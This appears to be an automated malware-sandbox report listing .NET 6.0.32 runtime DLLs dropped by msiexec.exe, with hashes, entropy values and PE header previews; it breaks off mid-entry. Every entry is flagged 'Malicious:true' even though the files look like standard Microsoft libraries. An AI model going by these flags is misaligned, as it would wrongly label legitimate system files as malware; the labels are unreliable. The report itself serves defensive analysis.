                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................." .....`...:......................................................I.....`...@......@............... .......................................e...........(..........P...T...............................................................H............text...._.......`.................. ..`.data....5...p...6...b..............@....reloc..............................@..B............................................0...........................l.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...T.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...C.o.l.l.e.c.t.i.o.n.s...C.o.n.c.u.r.r.e.n.t...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...d.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Collections.Immutable.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):666272
                                                                                                                                                                                                                                        Entropy (8bit):6.7865309669778995
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:Q36VIpN0cAxbgmaoB7yPXz66M4cR+c2/oMytOobmJS:Q3OZzaBruLqo
                                                                                                                                                                                                                                        MD5:2213144DBE8516B61EC845255E800E41
                                                                                                                                                                                                                                        SHA1:1B9BC3BA892B6F00AF3A83E3D7539C8118BDB551
                                                                                                                                                                                                                                        SHA-256:3A902B104DE903DDCB9C1FEC58A9D95769F31564D967008AD7232D08C5CD48E6
                                                                                                                                                                                                                                        SHA-512:916EB3A7B4306E2A47F9371DCD6BBB842435C5BDD99E967CE99736F316D445EC5212AD99BC36F1DBF705835077FBB54D415226118B4AADDFC98D6833ACA2A490
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................." ......................................................... ......l.....`...@......@............... ......................................4...P^.......(...... ...."..T...............................................................H............text............................... ..`.data...:.... ......................@....reloc.. ...........................@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...v./...C.o.m.m.e.n.t.s...T.h.i.s. .p.a.c.k.a.g.e. .p.r.o.v.i.d.e.s. .c.o.l.l.e.c.t.i.o.n.s. .t.h.a.t. .a.r.e. .t.h.r.e.a.d. .s.a.f.e. .a.n.d. .g.u.a.r.a.n.t.e.e.d. .t.o. .n.e.v.e.r. .c.h.a.n.g.e. .

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Collections.NonGeneric.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):101144
                                                                                                                                                                                                                                        Entropy (8bit):6.4771157203569025
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:vQqNPxgJRRQWsBTkyo+XBQCXeCLDrkEIE:4gxgJRbZEd
                                                                                                                                                                                                                                        MD5:C12C92B54FB343C99F8D01768A366D6E
                                                                                                                                                                                                                                        SHA1:51356DD0B443F14D894F9594F99F115B005104B1
                                                                                                                                                                                                                                        SHA-256:454712AD098DBB00653234FB5E7FB5E6EA7820813D34F0833BDB0D0CC7186CB5
                                                                                                                                                                                                                                        SHA-512:04D4E99B80083A9D6211945210AFE039917D182FDAD0BA035D8DFB076A048ABA3CEC5244E68C06C0068FA592468087EACFA164938232B015E4AE785DDFFAAF04
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...Gr............" .....L..........................................................?.....`...@......@............... ......................................83.......b...)..........X...T...............................................................H............text...@K.......L.................. ..`.data........`.......N..............@....reloc...............`..............@..B............................................0...........................l.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...T.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...C.o.l.l.e.c.t.i.o.n.s...N.o.n.G.e.n.e.r.i.c...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...d.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Collections.Specialized.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):95512
                                                                                                                                                                                                                                        Entropy (8bit):6.5344887890851435
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:da5jcaL7hPvoiTCxaDVvkDTC5O7/LyY20SRhpVeypaWszC:dmQC7ZNBsDTs+zyY20SRhpVeygn+
                                                                                                                                                                                                                                        MD5:47D9EE750FD6A7828D0A6CA892BC9E46
                                                                                                                                                                                                                                        SHA1:B0C23A5894F29A6725209E0EE38AAC135C506F8A
                                                                                                                                                                                                                                        SHA-256:53A99E65EC985625A9CC307F1307D2B8B353388A60E311DF1E7467D7DD22E6BB
                                                                                                                                                                                                                                        SHA-512:36C793702FED17B293A8204D555B1675E5297BA5DB84A3576324E4CCB601F1ED0A6B7BF997E51C9B77C5DCFC39D4639F5F3A30BC7D825CD7304A741CC816AA8E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....+..........." .....6..........................................................k.....`...@......@............... .......................................0..h....L...)...p......P...T...............................................................H............text...x4.......6.................. ..`.data...\....P.......8..............@....reloc.......p.......J..............@..B............................................0...........................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...V.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...C.o.l.l.e.c.t.i.o.n.s...S.p.e.c.i.a.l.i.z.e.d.....L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...f.....F.i.l.e.D.e.s.c.r.i.p.t.i.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Collections.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):264992
                                                                                                                                                                                                                                        Entropy (8bit):6.7616104773576104
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:f0bzf+JuwsctkH2KrzQ5t056pAje2l3ki7CL/df:f3JuwDiHQNW/7CLlf
                                                                                                                                                                                                                                        MD5:1EA34151310783585A8326FEF2FA355C
                                                                                                                                                                                                                                        SHA1:19F78734D779A14DA4B09443395A57BAB652353C
                                                                                                                                                                                                                                        SHA-256:61EF7CE0CB1459E2D58AF1795DD0BAFE8C925DEF4620D7EF756BA8EA9C51C0B6
                                                                                                                                                                                                                                        SHA-512:8C42C677026FBE809FB70DE051FF84B31653B07C5D0610358721E529F13563173729793E77F96EF0D966221E1BCE1A863EEBA7E65463A0B9734D5E5C798F95B0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...O............." .........@............................................................`...@......@............... ..................................t...,].......... )......,.......T...........................................................x...H............text............................... ..`.data.../9.......:..................@....reloc..,...........................@..B............................................0.......................d.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........|.....S.t.r.i.n.g.F.i.l.e.I.n.f.o...X.....0.0.0.0.0.4.b.0...>.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...C.o.l.l.e.c.t.i.o.n.s.....L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...N.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....S.y.s.t.e.m...C.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ComponentModel.Annotations.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):187040
                                                                                                                                                                                                                                        Entropy (8bit):6.460139009818362
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:1vPOpAmODFRGaOsFLvjF8IbGumTG5D5/vbF6d+F7iWY9LYw8XBd:h2psT2q1QG5NF7xwLYw8z
                                                                                                                                                                                                                                        MD5:AB0D22D8A5CD9A8C09A8E7E8F4B105B1
                                                                                                                                                                                                                                        SHA1:B9665F5A2298FB916935FE0D57A2AF351BBC8355
                                                                                                                                                                                                                                        SHA-256:4F5273AC3DE8AF28FB9DC7F931AAEB436E830EC79A6BB7B30790149F748A81E0
                                                                                                                                                                                                                                        SHA-512:157A76501C1C233CEBA5A0E77566DFA90FEA0153B7C3DDFB6D99F8809BF817774E6193EDD46B026F149BC0C07E405A0998EE511FD6914080FF14412B56236E78
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...d............." .....v...:............................................................`...@......@............... ...................................... G...........(..........("..T...............................................................H............text...*t.......v.................. ..`.data...a4.......6...x..............@....reloc..............................@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...\."...C.o.m.m.e.n.t.s...S.y.s.t.e.m...C.o.m.p.o.n.e.n.t.M.o.d.e.l...A.n.n.o.t.a.t.i.o.n.s...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...l."...F.i.l.e.D.e.s.c.r.i.p.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ComponentModel.DataAnnotations.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):17672
                                                                                                                                                                                                                                        Entropy (8bit):6.641311069044931
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:B8imyfJe9eGXxC4rcUXWuQXWWYA6VFHRN7Y6/7R9zb3cW4:B8jY1VFClY6F9zoW4
                                                                                                                                                                                                                                        MD5:593284F27C1B10A3B988C719A80F42B0
                                                                                                                                                                                                                                        SHA1:8DAA1B77155A6A80943E7CDE345D0D6A5D3392D8
                                                                                                                                                                                                                                        SHA-256:451E52F8C52FA0CB5F6F9F0AB15948B7F0F31371FBBA578DE9BDBA414DC0438E
                                                                                                                                                                                                                                        SHA-512:5C54051004C55CF2D7B25F3D74BBABA051EB79F510383BDBF0E62F622B02C9E752C4D3F11005533D2C0F2F6542A371D0672101A8FFB8BF6F70F952E5F138E63F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..............0... ...@....... ...............................=....`.................................;0..O....@...................)...`......8/..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................o0......H.......P ..h...........................................................BSJB............v4.0.30319......l...D...#~......L...#Strings............#US.........#GUID.......X...#Blob............T.........3....................................+...............M.p...P.p.....]...........................O.....7.................>.....[...............................9.....p.................W.....W.....W...).W...1.W...9.W...A.W...I.W...Q.W...Y.W...a.W...i.W...q.W...y.W.....W. ...W.....W...

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ComponentModel.EventBasedAsync.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):38576
                                                                                                                                                                                                                                        Entropy (8bit):6.482988194804308
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:ZWvdwWWoG2fC/yrkEWyiIo/DstPAoWbEwbLmkDxTip9kZFDXSO88+6EZccdwVOR0:IkdyrkRPwqfxI484taDuKWWts89zi
                                                                                                                                                                                                                                        MD5:B90AB8335BE300D2D6CCD4A8D6F9B087
                                                                                                                                                                                                                                        SHA1:1E0C8A067E0ECDE4EE76B92E0B4584BFEC356B80
                                                                                                                                                                                                                                        SHA-256:D84C335A6D2CA1BC60A08ABB82EAE992865ABEA238EE9AECF409709E35A1D8B3
                                                                                                                                                                                                                                        SHA-512:1BF05FB931667B0D85C2DF8219A135647FC92A0DC59FFF352B88570694E719AB1A81E7942F555EC4F14A57EDB0A04CFAD1FB3884DE2FB0EBCFB3BD6EC5EFAF67
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................." .....b..........................................................q7....`...@......@............... ......................................$...x....n...(..............T...............................................................H............text...Ra.......b.................. ..`.data................d..............@....reloc...............l..............@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...d.&...C.o.m.m.e.n.t.s...S.y.s.t.e.m...C.o.m.p.o.n.e.n.t.M.o.d.e.l...E.v.e.n.t.B.a.s.e.d.A.s.y.n.c...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...t.&...F.i.l.e.D.e.s.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ComponentModel.Primitives.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):75528
                                                                                                                                                                                                                                        Entropy (8bit):6.423261308572458
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:XnGO8FwPsQAtTKNI6T1mb1yF0YDC2oKQ15hv97Q8a7ehFClV5iK9zH:3GeUP6kYFlC2oKQVZ8uiV5nzH
                                                                                                                                                                                                                                        MD5:1F9A3B96F29E4D2F255F9F415202545E
                                                                                                                                                                                                                                        SHA1:5C7C07B718C0F6F4BBFFFC2F0B15EC5FFC71A18C
                                                                                                                                                                                                                                        SHA-256:0C7FEC8BB98188024E540B5B07138DC687A64A7BD7BCB0184F94B883CCC6573B
                                                                                                                                                                                                                                        SHA-512:88A435AC1F0EE381E8CE873D1B59BDF34C94B9C081C83421AB0960954463CA44A8DFCC1899FCE4CA9EF3F1B04A7E2F1534B0C1A2E3D03213638F00B7E7942261
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....i..........." ......................................................... ......t&....`...@......@............... .......................................&...........)..............T...............................................................H............text............................... ..`.data...............................@....reloc..............................@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...Z.!...C.o.m.m.e.n.t.s...S.y.s.t.e.m...C.o.m.p.o.n.e.n.t.M.o.d.e.l...P.r.i.m.i.t.i.v.e.s.....L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...j.!...F.i.l.e.D.e.s.c.r.i.p.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ComponentModel.TypeConverter.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):744608
                                                                                                                                                                                                                                        Entropy (8bit):6.69105296530575
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:D9LNoeQ4iz7+tGNAZ4TVR+aAFMAmquhQa734HqPl0nVUSfDNzPJ8QeBnd8ctZI3B:v54jTVR+aAFMAmqu72KQeBnDtZIdl4le
                                                                                                                                                                                                                                        MD5:0103B7C4543CE5C30E0772318D95903A
                                                                                                                                                                                                                                        SHA1:43576B591E533BD165FCFE67C795B29C413FA45E
                                                                                                                                                                                                                                        SHA-256:607B67AA9B2DED9244581F7695D0F13F1B42231632AFCC42B1292A51E17B5D42
                                                                                                                                                                                                                                        SHA-512:A4547E5DF90BA94723CFE3DE77471EF644BD92E3800B367483EB8A2A99079AB4A6009B27AECF253C6C611768D8E27509215A492997779BD216BD91DEC408B3BE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...u............." .....h...................................................P............`...@......@............... ...........................................]...4...(...@.......=..T...............................................................H............text...kg.......h.................. ..`.data................j..............@....reloc.......@.......&..............@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...`.$...C.o.m.m.e.n.t.s...S.y.s.t.e.m...C.o.m.p.o.n.e.n.t.M.o.d.e.l...T.y.p.e.C.o.n.v.e.r.t.e.r...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...p.$...F.i.l.e.D.e.s.c.r.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ComponentModel.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):18592
                                                                                                                                                                                                                                        Entropy (8bit):6.578998888705223
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:IpW4W1WhvBQScpij+7Co0WECYA6VFHRN71Bmo8R9zMLK2B:lnScNx7FClHmoQ9zFM
                                                                                                                                                                                                                                        MD5:ACFE404D1F4FC2A4764CB8730F694669
                                                                                                                                                                                                                                        SHA1:4B226ED287BDF7BA97E7920A0A63D72984DA8737
                                                                                                                                                                                                                                        SHA-256:C3BBD79CAD9FC5A8131A2A80E452EB517B470D7AA890BB0D9DAA85733705DCEA
                                                                                                                                                                                                                                        SHA-512:8D970290BB05E05AEB94B109B326C354B9F5C60A6DF276D3DE48AD7FF3E5F11CA8CEABC9898595B30AEA3B2A776F04457B4A4878F7ABAEDE11A18C244CB935F8
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................" .........................................................P............`...@......@............... ..........................................`.... ...(...@...... ...T...............................................................H............text............................... ..`.data...N....0......................@....reloc.......@......................@..B............................................0.......................t...,.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o...h.....0.0.0.0.0.4.b.0...D.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...C.o.m.p.o.n.e.n.t.M.o.d.e.l...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...T.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....S.y.s.t.e.m.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Configuration.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):19632
                                                                                                                                                                                                                                        Entropy (8bit):6.558847302673581
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:HXoWX0yXQB1uXTSv/fvNRvGZYdf3zyP/weAEyUDhlWvONWHX6HRN7P6R9zqg67Pv:QniA2eWP29zm7jz
                                                                                                                                                                                                                                        MD5:5F280F450CBCE8D1E6604BF2CEC2420F
                                                                                                                                                                                                                                        SHA1:318D47DD9EAC1856356F2BB2A7A688F0B5B6EA7D
                                                                                                                                                                                                                                        SHA-256:EA9D9416D88ED906C118675224CA7DF5DCE0B6F7E0A9FF0331F32D56718B116A
                                                                                                                                                                                                                                        SHA-512:8D0A77D17D63AEE05308E5F167B17B5615F705802A3FA45FB91B003A47C4289CAFA8C7814D121F83E8DA37B3CD86AD1A89CDDAA7AA717E46E9F6DA3547E49A12
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....D]..........." ..0..............9... ...@....... ....................................`..................................9..O....@...............$...(...`.......8..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......."..............@..B.................9......H.......P ......................88......................................BSJB............v4.0.30319......l.......#~......h...#Strings............#US.........#GUID.......P...#Blob............T.........3....................................h.....D...............s.......|...............D.z...............Z.................0.....M.................<............."...,...................v.....v.....v...).v...1.v...9.v...A.v...I.v...Q.v...Y.v...a.v...i.v...q.v...y.v.....v. ...v.....v...

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Console.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):156832
                                                                                                                                                                                                                                        Entropy (8bit):6.5964367947706215
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:K8z3iIcbCwq+p1waxbwbKBUOmOaYMGFyCN:veLh67clFys
                                                                                                                                                                                                                                        MD5:201166FA1E8E70153B374329A0FD284D
                                                                                                                                                                                                                                        SHA1:BFB399E7F79619B38BE849AC6B6A98AEE8E6A2D4
                                                                                                                                                                                                                                        SHA-256:0DCE6AEBDD65D76FA922723DA65CA8BF1207F93B44B0B201BB2FE16A24A7EDA9
                                                                                                                                                                                                                                        SHA-512:B05620B66789CB71635258A7BAB8C7D7B79260CDCA22EE9214241B017BAB8C2D31583ED0A2DE02AABDCDD39E4FD25FEF4292D6E221CF56F2500DC6F92F014188
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....^}..........." .........$...............................................`.......S....`...@......@............... .......................................<.......<...(...P......p...T...............................................................H............text............................... ..`.data........0... ..................@....reloc.......P.......8..............@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Core.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):24328
                                                                                                                                                                                                                                        Entropy (8bit):6.298742718525896
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:8sIbPFWOUSnPEW51b04H9DGMq/tE8aQjryAkxkBm4U1zXtBC17KIDRWXb2WjYA64:8vPFWOUSnP751b04H9DGMq/tE8aQjryH
                                                                                                                                                                                                                                        MD5:40D5E469C55306B8672F327B8E4B9667
                                                                                                                                                                                                                                        SHA1:EB53D4C4978A760DFB27FDA5934E023102FFD64B
                                                                                                                                                                                                                                        SHA-256:5EF5D3758C1B1EAB45BBD17D6CAFBFF6510E284A47E385C81DAEC6559D5A0796
                                                                                                                                                                                                                                        SHA-512:34D9D261B2DECDA332D1E6469F903E436CB66FA6780C6091AC0FFB7846998A18674191132B3E55778673D5164EFA5CBC6D0DF28BEAC1F8B896FDFE086D82A5B2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O.\..........." ..0..,...........J... ...`....... ...............................7....`.................................CJ..O....`..8............6...)..........tI..T............................................ ............... ..H............text....*... ...,.................. ..`.rsrc...8....`......................@..@.reloc...............4..............@..B................wJ......H.......P ...(...................H......................................BSJB............v4.0.30319......l.......#~..........#Strings.....%......#US..%......#GUID....%......#Blob............T.........3............................................................................1.N...c.................y.....0...........].....z...................................K...................[.....[.....[...).[...1.[...9.[...A.[...I.[...Q.[...Y.[...a.[...i.[...q.[...y.[.....[. ...[.....[...

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Data.Common.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
